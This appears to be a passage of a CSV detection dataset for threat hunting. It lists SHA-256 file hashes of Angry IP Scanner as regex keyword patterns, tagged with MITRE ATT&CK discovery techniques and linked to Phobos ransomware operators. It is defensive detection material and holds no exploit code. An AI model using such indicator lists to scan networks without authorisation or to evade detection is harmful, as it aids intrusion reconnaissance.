"*410e18b7e5221f4759bc9f7ed1c2daf1fa919b588db0f3430819854bd0c3d432*",".{0,1000}410e18b7e5221f4759bc9f7ed1c2daf1fa919b588db0f3430819854bd0c3d432.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*41b647ed1bfa946a10402ea65ff73f59309ac1a208e304f2ce68664ad247e3d7*",".{0,1000}41b647ed1bfa946a10402ea65ff73f59309ac1a208e304f2ce68664ad247e3d7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*43a9334196ef0bd1d9c1247b7fac5110f4fa1daabd565f7ff5b6e2e8ae5102cc*",".{0,1000}43a9334196ef0bd1d9c1247b7fac5110f4fa1daabd565f7ff5b6e2e8ae5102cc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*442fbc52ff95adad5ab1e0325fe7a74c5aef1816c6870d83df2fba658edb208d*",".{0,1000}442fbc52ff95adad5ab1e0325fe7a74c5aef1816c6870d83df2fba658edb208d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4452bf743b91f801adca4d2faeb2333fc33f22a478251d6b910f204f0f06dd6c*",".{0,1000}4452bf743b91f801adca4d2faeb2333fc33f22a478251d6b910f204f0f06dd6c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*451728655552b12d5f39dc742f9877f79ba194ec57b2807821d09b9e4094315a*",".{0,1000}451728655552b12d5f39dc742f9877f79ba194ec57b2807821d09b9e4094315a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*461c507d612d0d88c91ef4dde79f266ecbaa3b5518df24597b8b40af6dc90ddb*",".{0,1000}461c507d612d0d88c91ef4dde79f266ecbaa3b5518df24597b8b40af6dc90ddb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*47e3c8363e117bc8712d431f05e7041f313629dd27efb004a369bf24b07c6908*",".{0,1000}47e3c8363e117bc8712d431f05e7041f313629dd27efb004a369bf24b07c6908.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*491c9767bdd4c5b94794d52caa0d2e4c50239b235adbc0e2b4b12a15639ec4c0*",".{0,1000}491c9767bdd4c5b94794d52caa0d2e4c50239b235adbc0e2b4b12a15639ec4c0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4b1a9bf186122958ed2d540c0c182057421d0caf9ede82514fe9905705bd49ee*",".{0,1000}4b1a9bf186122958ed2d540c0c182057421d0caf9ede82514fe9905705bd49ee.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4b25db2797b029ea009c3a5267c2e7e91ad6857cd2a8603df19cb8d94e5aaa5c*",".{0,1000}4b25db2797b029ea009c3a5267c2e7e91ad6857cd2a8603df19cb8d94e5aaa5c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4b4cbc201cc169fe490db4a53cf034b28592ea33a14bf38c9a422c1ab4650159*",".{0,1000}4b4cbc201cc169fe490db4a53cf034b28592ea33a14bf38c9a422c1ab4650159.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4bb56ba1129679c1f8ad298151de05396a2962b970f98062dc85edcabb7070e1*",".{0,1000}4bb56ba1129679c1f8ad298151de05396a2962b970f98062dc85edcabb7070e1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4beb7f83d9996c45b7d2f0b504400ad6b87c93793c231d629c47733e8275323c*",".{0,1000}4beb7f83d9996c45b7d2f0b504400ad6b87c93793c231d629c47733e8275323c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4bec505b55c8b2271556dee2b689b05586c54cf1ba32a581bb5ebaaa4f42f580*",".{0,1000}4bec505b55c8b2271556dee2b689b05586c54cf1ba32a581bb5ebaaa4f42f580.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4d31231f9468824107afb6c11e99630e80c98fb347658677cf2c1111d00771c3*",".{0,1000}4d31231f9468824107afb6c11e99630e80c98fb347658677cf2c1111d00771c3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*4d8811ff14a7bb842fc02825314f76f7484264ae753814af74fc2412f17b1a75*",".{0,1000}4d8811ff14a7bb842fc02825314f76f7484264ae753814af74fc2412f17b1a75.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*50455d300e96d1d186ff81c97bb45d4697bd057c6a4fa92b280ff8782121ef86*",".{0,1000}50455d300e96d1d186ff81c97bb45d4697bd057c6a4fa92b280ff8782121ef86.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*50f0408d2544a0660a23acfcb9f2ef1a5883adc11861bc9f810367e45aad054d*",".{0,1000}50f0408d2544a0660a23acfcb9f2ef1a5883adc11861bc9f810367e45aad054d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*50f914c195773487957cbdf262fa8e866e17e715bee3418e9591b2f161a16269*",".{0,1000}50f914c195773487957cbdf262fa8e866e17e715bee3418e9591b2f161a16269.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*50fd26b82963fe0813a7cc5a5d1b4c2adb75cac715c498176e8bfc5aba7e5307*",".{0,1000}50fd26b82963fe0813a7cc5a5d1b4c2adb75cac715c498176e8bfc5aba7e5307.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*512f4208d0376a5c5b555930b8c4a3fc3a5a12680655b3d3a167888e6ef202b0*",".{0,1000}512f4208d0376a5c5b555930b8c4a3fc3a5a12680655b3d3a167888e6ef202b0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5273cd88fcbbafe3921dbb88f330a09b4b00c6bbad7d4bc0bf897558a24bb5eb*",".{0,1000}5273cd88fcbbafe3921dbb88f330a09b4b00c6bbad7d4bc0bf897558a24bb5eb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5343c3e7100eac4771f00f0b66e26a821be87ae8e8694815d168ad4dd5cd4352*",".{0,1000}5343c3e7100eac4771f00f0b66e26a821be87ae8e8694815d168ad4dd5cd4352.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*53eb02c62b6ce83e8656eb978259cd26923613d545eb2d63ebba017997b2d672*",".{0,1000}53eb02c62b6ce83e8656eb978259cd26923613d545eb2d63ebba017997b2d672.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*564d2db592127c85b801082955d3af40a9e0a485a2dc5c9d960e8d685621b943*",".{0,1000}564d2db592127c85b801082955d3af40a9e0a485a2dc5c9d960e8d685621b943.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*56976a6b2d3b62ef3e46626df51eb20a4e849e346a5292bf923481f4efb5da4a*",".{0,1000}56976a6b2d3b62ef3e46626df51eb20a4e849e346a5292bf923481f4efb5da4a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*56a728c930af1ddb0583940149de58fa36b2d02cd318e6c437583f121dbcfb6a*",".{0,1000}56a728c930af1ddb0583940149de58fa36b2d02cd318e6c437583f121dbcfb6a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*56d615c6338475744a0259e928f7f20aa88f8bd4889d7a3db3e5a0e5a55a5fb8*",".{0,1000}56d615c6338475744a0259e928f7f20aa88f8bd4889d7a3db3e5a0e5a55a5fb8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*56eae0c5b8a8607a8f25aecae5069fe0555333beef9333cd44a2e8846740529a*",".{0,1000}56eae0c5b8a8607a8f25aecae5069fe0555333beef9333cd44a2e8846740529a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*572a3066b441a61d177c6858322547d508fcbeca9111bcc5db3087d426d9b687*",".{0,1000}572a3066b441a61d177c6858322547d508fcbeca9111bcc5db3087d426d9b687.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*588883f038421d2b273d9c10da1b195a75ca107c274645cf620934d8ee037e9e*",".{0,1000}588883f038421d2b273d9c10da1b195a75ca107c274645cf620934d8ee037e9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*58d81810dda7c93466ab675fb3429d65f4b658ee9c1c1c7113276906abc31de2*",".{0,1000}58d81810dda7c93466ab675fb3429d65f4b658ee9c1c1c7113276906abc31de2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*58f05a0c076f117a861b408411b8c4f1d1e6e3a9f15fdc0501a99a423f80f6bc*",".{0,1000}58f05a0c076f117a861b408411b8c4f1d1e6e3a9f15fdc0501a99a423f80f6bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5abf08594b53850df4821a89755c9578b357577b1f356b2346b0eda7f1e47ba4*",".{0,1000}5abf08594b53850df4821a89755c9578b357577b1f356b2346b0eda7f1e47ba4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5b9244ba79420f46fc1a1cf762c3497767bc93b863f0224ce7d5051f81a6120e*",".{0,1000}5b9244ba79420f46fc1a1cf762c3497767bc93b863f0224ce7d5051f81a6120e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5bdbde8744cb35a016a5af05c34df1e709d8c731dfc4206e5725e2dead801e9b*",".{0,1000}5bdbde8744cb35a016a5af05c34df1e709d8c731dfc4206e5725e2dead801e9b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5bf7ab659ccc836dc47a5c60a8bc653aaed5ff945334f4f1af0ed596c23523c6*",".{0,1000}5bf7ab659ccc836dc47a5c60a8bc653aaed5ff945334f4f1af0ed596c23523c6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5c706aa708b87098f372add5b7c1693e4255462da1cd0f08ce60918e030a6085*",".{0,1000}5c706aa708b87098f372add5b7c1693e4255462da1cd0f08ce60918e030a6085.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5c80fae298c7042c21a46ba76985ab79303001af8b26ea073712d5bff68c7215*",".{0,1000}5c80fae298c7042c21a46ba76985ab79303001af8b26ea073712d5bff68c7215.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5e3df2bbf690bb6e9c58ac2ca4a1ae825d5242159846e5b712c89afd839f6f0c*",".{0,1000}5e3df2bbf690bb6e9c58ac2ca4a1ae825d5242159846e5b712c89afd839f6f0c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5e993a83d506ed23eb4296fb718b1c2ed0dedeb5d3d65cc7860d6176cf0a0ee9*",".{0,1000}5e993a83d506ed23eb4296fb718b1c2ed0dedeb5d3d65cc7860d6176cf0a0ee9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5f2b814295bd21c4480661eac4a9c57b50030d7bf7a7fa4c6f9b0640feb5eb9c*",".{0,1000}5f2b814295bd21c4480661eac4a9c57b50030d7bf7a7fa4c6f9b0640feb5eb9c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5f36bb51a099a20c72d69123aa5b17558fa78ba37b5d340b8db9877e4055ad0e*",".{0,1000}5f36bb51a099a20c72d69123aa5b17558fa78ba37b5d340b8db9877e4055ad0e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5f6ea6654bdf44865cba30a5cb6286407d0362936dbc8a8ea2b6e7859881f99d*",".{0,1000}5f6ea6654bdf44865cba30a5cb6286407d0362936dbc8a8ea2b6e7859881f99d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*5fec32c0fd6dae3b84bd2533e69916a65066176439e8b8481dffc2c565ac70cd*",".{0,1000}5fec32c0fd6dae3b84bd2533e69916a65066176439e8b8481dffc2c565ac70cd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*60f5f94a3dd286eb0339e370e3a1e09af4f183b6b1aeefa3489eb6ff3e9d9983*",".{0,1000}60f5f94a3dd286eb0339e370e3a1e09af4f183b6b1aeefa3489eb6ff3e9d9983.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*61ff953579f1bd83798d1038df66aafbccb8baa85cc8049efb78a280c09d9768*",".{0,1000}61ff953579f1bd83798d1038df66aafbccb8baa85cc8049efb78a280c09d9768.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*62ec1cf50d9485956704274b698e0bfc6cf090650794b8d6cc9a0d7b75638bdf*",".{0,1000}62ec1cf50d9485956704274b698e0bfc6cf090650794b8d6cc9a0d7b75638bdf.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*633add8af3d5bde70aeb20247a4d5fa4f19a93f12764e216155a94e026937f6d*",".{0,1000}633add8af3d5bde70aeb20247a4d5fa4f19a93f12764e216155a94e026937f6d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*66cf5a1681259b3e801b8effceaa210e4c66eba58c9ab260ddc7463474c637e6*",".{0,1000}66cf5a1681259b3e801b8effceaa210e4c66eba58c9ab260ddc7463474c637e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*671ebf4a6d78b932d9544bb7c6469d0e08bd6124462f5b94d90597b82c5579b5*",".{0,1000}671ebf4a6d78b932d9544bb7c6469d0e08bd6124462f5b94d90597b82c5579b5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*689798d97c80041b0d42e4db12ba8d85b30889fccca42e92faed8d5151ffc91d*",".{0,1000}689798d97c80041b0d42e4db12ba8d85b30889fccca42e92faed8d5151ffc91d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*68b1bf3e1cd96f1ac58a0a90b888a2f483b6996bc46d61dd4ae630f23dab93a1*",".{0,1000}68b1bf3e1cd96f1ac58a0a90b888a2f483b6996bc46d61dd4ae630f23dab93a1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*69840aa0cd9ecadd2cf19e7a52f429e46df6d2945022a0ed0186343d10706094*",".{0,1000}69840aa0cd9ecadd2cf19e7a52f429e46df6d2945022a0ed0186343d10706094.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*69d3a5d9b30baf4ed4b24c664eb1e787647acc8e9d631f2498e934c9431c829e*",".{0,1000}69d3a5d9b30baf4ed4b24c664eb1e787647acc8e9d631f2498e934c9431c829e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6b2bc6c1948e0462eabd40d92b7201d44648655679fde260454ce7f970d78b23*",".{0,1000}6b2bc6c1948e0462eabd40d92b7201d44648655679fde260454ce7f970d78b23.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
